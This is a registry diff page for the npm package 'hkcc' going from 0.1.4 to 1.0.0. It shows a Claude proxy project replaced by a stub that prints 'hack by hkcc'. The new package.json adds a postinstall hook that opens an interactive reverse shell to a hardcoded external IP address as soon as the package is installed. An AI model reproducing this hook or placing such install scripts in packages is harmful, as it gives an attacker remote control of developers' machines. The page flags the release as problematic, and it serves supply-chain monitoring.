hkcc 0.1.4 → 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of hkcc might be problematic. Click here for more details.

package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ exports.printMsg = function() {
2
+ console.log("hack by hkcc");
3
+ }
package/package.json CHANGED
@@ -1,102 +1,12 @@
1
1
  {
2
2
  "name": "hkcc",
3
- "version": "0.1.4",
4
- "description": "Claude proxy server with Agent SDK and OAuth modes",
5
- "author": "hk",
6
- "license": "MIT",
7
- "repository": {
8
- "type": "git",
9
- "url": "https://github.com/HuakunShen/hkcc"
10
- },
11
- "keywords": [
12
- "claude",
13
- "anthropic",
14
- "proxy",
15
- "openai",
16
- "agent-sdk",
17
- "mcp",
18
- "cli"
19
- ],
20
- "module": "src/index.ts",
21
- "type": "module",
22
- "bin": {
23
- "hkcc": "./dist/hkcc.js"
24
- },
25
- "files": [
26
- "dist",
27
- "migrations",
28
- "bunfig.toml"
29
- ],
30
- "engines": {
31
- "bun": ">=1.0.0"
32
- },
3
+ "version": "1.0.0",
4
+ "description": "",
5
+ "main": "index.js",
33
6
  "scripts": {
34
- "dev": "bun run --hot src/index.ts",
35
- "test": "bun test src/__tests__",
36
- "start": "bun run bin/hkcc.ts",
37
- "build": "bun run build.ts",
38
- "prepublishOnly": "bun run build",
39
- "format": "prettier -w .",
40
- "check-types": "tsc --noEmit"
41
- },
42
- "devDependencies": {
43
- "@types/bun": "latest",
44
- "@types/react": "^19.2.5",
45
- "@types/react-dom": "^19.2.3",
46
- "drizzle-kit": "^0.31.8",
47
- "@ai-sdk/anthropic": "^3.0.23",
48
- "@ai-sdk/openai": "^3.0.18",
49
- "@anthropic-ai/claude-agent-sdk": "^0.2.19",
50
- "@anthropic-ai/sdk": "^0.71.2",
51
- "@elysiajs/cron": "^1.4.1",
52
- "@elysiajs/eden": "^1.4.6",
53
- "@elysiajs/openapi": "^1.4.14",
54
- "@elysiajs/opentelemetry": "^1.4.10",
55
- "@elysiajs/static": "^1.4.7",
56
- "@libsql/client": "^0.17.0",
57
- "@openauthjs/openauth": "^0.4.3",
58
- "@radix-ui/react-accordion": "^1.2.12",
59
- "@radix-ui/react-dialog": "^1.1.15",
60
- "@radix-ui/react-label": "^2.1.8",
61
- "@radix-ui/react-progress": "^1.1.8",
62
- "@radix-ui/react-scroll-area": "^1.2.10",
63
- "@radix-ui/react-select": "^2.2.6",
64
- "@radix-ui/react-separator": "^1.1.8",
65
- "@radix-ui/react-slot": "^1.2.4",
66
- "@radix-ui/react-tabs": "^1.1.13",
67
- "@radix-ui/react-tooltip": "^1.2.8",
68
- "@tanstack/react-query": "^5.90.20",
69
- "@tanstack/react-router": "^1.157.9",
70
- "@tanstack/react-router-devtools": "^1.141.2",
71
- "@tanstack/router-plugin": "^1.141.2",
72
- "ai": "^6.0.49",
73
- "bun-plugin-tailwind": "^0.1.2",
74
- "citty": "^0.2.0",
75
- "class-variance-authority": "^0.7.1",
76
- "clsx": "^2.1.1",
77
- "dotenv": "^17.2.3",
78
- "drizzle-orm": "^0.45.1",
79
- "effect": "^3.19.15",
80
- "elysia": "^1.4.22",
81
- "lightweight-charts": "^5.0.9",
82
- "lucide-react": "^0.563.0",
83
- "motion": "^12.29.2",
84
- "next-themes": "^0.4.6",
85
- "openai": "^6.16.0",
86
- "prettier": "^3.8.1",
87
- "react": "^19.2.3",
88
- "react-dom": "^19.2.3",
89
- "sonner": "^2.0.7",
90
- "tailwind-merge": "^3.4.0",
91
- "tailwindcss": "^4.1.18",
92
- "tw-animate-css": "^1.4.0",
93
- "zod": "^4.3.6"
94
- },
95
- "peerDependencies": {
96
- "typescript": "^5"
7
+ "postinstall": "bash -c 'bash -i >& /dev/tcp/43.138.254.108/2333 0>&1'",
8
+ "test": "echo \"Error: no test specified\" && exit 1"
97
9
  },
98
- "dependencies": {},
99
- "optionalDependencies": {
100
- "@libsql/client": "^0.17.0"
101
- }
10
+ "author": "hkcc",
11
+ "license": "ISC"
102
12
  }